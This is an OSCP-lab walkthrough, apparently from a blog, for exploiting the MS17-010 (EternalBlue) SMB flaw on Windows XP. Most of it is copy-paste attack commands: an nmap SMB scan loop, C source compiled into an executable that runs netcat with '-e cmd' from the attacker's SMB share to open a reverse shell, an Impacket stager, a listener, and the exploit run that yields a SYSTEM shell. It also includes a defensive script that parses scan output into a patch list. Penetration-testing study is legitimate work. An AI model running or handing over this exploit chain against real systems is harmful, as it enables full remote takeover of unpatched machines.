Exploit Eternal Blue (MS17–010) for Windows XP with custom payload
Summary
This article shows you how to exploit the MS17–010 vulnerability on Windows XP.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Why this post?
During my OSCP training I had a lot of trouble rooting XP target ‘Xlicx in Wonderland’. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.
This walkthrough has been prepared in such a way that it should always work on any system running Windows XP or Windows 2000 ('JD') that is vulnerable to MS17–010.
Our final payload will be an executable file that:
- will set up a netcat reverse shell (port 8080)
The POC consists of two machines: the victim (Windows XP) and an attacker machine (Kali Linux 2022.1).
victim:
- Windows XP Professional SP3
- IP address: 192.168.62.149
- Security: Default Windows firewall = ON
- File and Print sharing = enabled
Attacker (for reverse shell):
- Kali Linux
- IP-Address: 192.168.62.161
In this guide I use the terms 'kali' and 'LHOST' interchangeably (we will use the variables 'kali' or 'LHOST'). You can change this address to your needs and copy + paste the code into a Bash terminal.
Prerequisites
We start by installing preconditions that must be in place before we can run the exploit.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).
cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R
2. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Install the virtualenv tool.
sudo apt install virtualenv
3. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a python2 virtual environment inside the Impacket directory.
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
Result: you should have a prompt changed to ‘(impacket-venv)’.
4. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2
cd /tmp
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py
5. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the python2 virtual environment ‘(impacket-venv)’, install Impacket requirements.
cd /opt/impacket
pip install -r requirements.txt
pip install .
Enumeration
Now that you have updated your system with the requirements to run the exploit, you can start scanning the target machine (Windows XP in our case).
6. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Use nmap to scan the target machine for SMB vulnerabilities. The loop below runs every smb-* NSE script except the brute-force and flood ones, one script at a time, and keeps only the script-output lines (those starting with "|").
cd /usr/share/nmap/scripts
target=192.168.62.149
p=445
scriptargs='smbpass=,smbdomain=mydomain.com,unsafe=1'
for script in $(ls smb* | grep -v -e brute -e flood); do echo "=== $script ==="; sudo nmap "$target" --script="$script" --script-args="$scriptargs" -p "$p" | grep "|"; done
Our target machine is vulnerable to MS17–010!
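When the loop above is run against more than one host, the interesting part of the output is the "State:" line under smb-vuln-ms17-010. The following Python 3 script is an added example (not part of the original article, and not from the nmap project) that parses nmap's normal-format output and reports, per host, the state of port 445 and the MS17-010 verdict, so a defender can turn a subnet scan into a patch list. The sample output embedded in SAMPLE_NMAP_OUTPUT is constructed for the example, modelled on the layout of the smb-vuln-ms17-010 script output; the function and variable names are my own.

```python
import re

# Constructed sample of `nmap --script smb-vuln-ms17-010 -p 445` normal output
# (three hosts, assumed layout; not real scan data from the article)
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.62.149
Host is up (0.00042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.168.62.150
Host is up (0.00051s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.62.151
Host is up (0.00039s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^445/tcp\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|\s*smb-vuln-ms17-010:")
STATE_RE = re.compile(r"^\|\s*State:\s*(\S+)")


def parse_ms17_010(nmap_text):
    """Return {host: {"port445": <nmap port state>, "ms17_010": <verdict>}}.

    A host that nmap lists but for which the script printed no State line
    gets the verdict "not reported": the script only emits output when it
    has something to say, so absence is not proof of patching.
    """
    results = {}
    host = None
    in_script = False  # True while inside the smb-vuln-ms17-010 block
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = {"port445": "unknown", "ms17_010": "not reported"}
            in_script = False
            continue
        if host is None:
            continue  # preamble before the first host
        m = PORT_RE.match(line)
        if m:
            results[host]["port445"] = m.group(1)
            continue
        if SCRIPT_RE.match(line):
            in_script = True
            continue
        if in_script:
            m = STATE_RE.match(line)
            if m:
                results[host]["ms17_010"] = m.group(1)
                in_script = False
    return results


def vulnerable_hosts(nmap_text):
    """Sorted list of hosts whose MS17-010 state is VULNERABLE (the patch list)."""
    return sorted(h for h, r in parse_ms17_010(nmap_text).items()
                  if r["ms17_010"] == "VULNERABLE")


if __name__ == "__main__":
    for host, r in parse_ms17_010(SAMPLE_NMAP_OUTPUT).items():
        print("%-16s port445=%-7s ms17-010=%s" % (host, r["port445"], r["ms17_010"]))
    print("patch list:", vulnerable_hosts(SAMPLE_NMAP_OUTPUT))
```

To use it on a real scan, save nmap's normal output with -oN and pass the file contents to parse_ms17_010(). Hosts with port 445 open but no script verdict (192.168.62.150 in the sample) deserve a second look rather than a green tick, which is why the parser keeps them separate from hosts where the port is closed.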
Payload creation (for Windows XP)
Our final payload will be an executable file that:
- will set up a netcat reverse shell (port 8080)
Everything we need to run the exploit is copied to the /tmp directory on Kali. This directory will be made available to the target with the Impacket SMB server (step 10).
7. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Copy and paste the Bash lines below to create the C source file /tmp/testexe.c. Adjust the value of 'kali=' to your Kali IP address. The source is written with a heredoc; the doubled backslashes are needed because the shell and then the C compiler each consume one level of escaping, so that the UNC path ends up as \\<kali>\smb\nc.exe at runtime.
kali=192.168.62.161
portnc2=8080
cd /tmp
cat > testexe.c <<EOF
#include <stdlib.h>
int main ()
{
int i;
i = system ("START /B \\\\\\\\$kali\\\\smb\\\\nc.exe $kali $portnc2 -e cmd");
return 0;
}
EOF
Result is source file /tmp/testexe.c
8. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Compile /tmp/testexe.c to /tmp/ruby-xp.exe (the name ruby-xp.exe is arbitrary; it can be something else if you want).
/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby-xp.exe
/usr/bin/i686-w64-mingw32-strip /tmp/ruby-xp.exe
You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby-xp.exe).
Netcat reverse shell payload
Our final payload file (ruby-xp.exe) will set up a netcat reverse shell on TCP port 8080. This is done by the following line of code (as it appears in testexe.c after the shell has expanded the variables):
i = system ("START /B \\\\192.168.62.161\\smb\\nc.exe 192.168.62.161 8080 -e cmd");
9. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Copy netcat to the staging directory (/tmp).
cp /usr/share/windows-resources/binaries/nc.exe /tmp
Set up the required listeners
Next open a new instance of the Bash terminal. Open a new tab for each "listener"; this walkthrough needs two (the SMB server and the netcat listener).
10. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Set up an SMB server (the stager) that serves /tmp, so the target can fetch nc.exe from it.
sudo impacket-smbserver -ip 192.168.62.161 -port 445 smb /tmp/
11. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Start a netcat listener on port 8080 to catch the reverse shell connection.
rlwrap nc -nlvp 8080
Prepare MS17–010 exploit
We have now made our preparations for the payload. The next section is about running the actual exploit. Open a new Bash Terminal instance to execute the commands.
12. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Download the exploit.
cd /tmp
git clone https://github.com/helviojunior/MS17-010.git
13. Performed on 192.168.62.161 (attacker machine, Kali Linux)
(Re)activate the Python2 virtual environment inside the Impacket folder (the virtualenv command is harmless if the environment from step 3 already exists).
cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate
14. Performed on 192.168.62.161 (attacker machine, Kali Linux)
Inside the Python2 environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.149) with our payload file (/tmp/ruby-xp.exe).
python2 /tmp/MS17-010/send_and_execute.py 192.168.62.149 /tmp/ruby-xp.exe
Check out our results:
SMB listener
An SMB connection is established.
Netcat listener
We have a SYSTEM shell!
In my next blog, I will focus more on exploiting Active Directory. I will show you how to use PowerShell Empire as an alternative to mimikatz.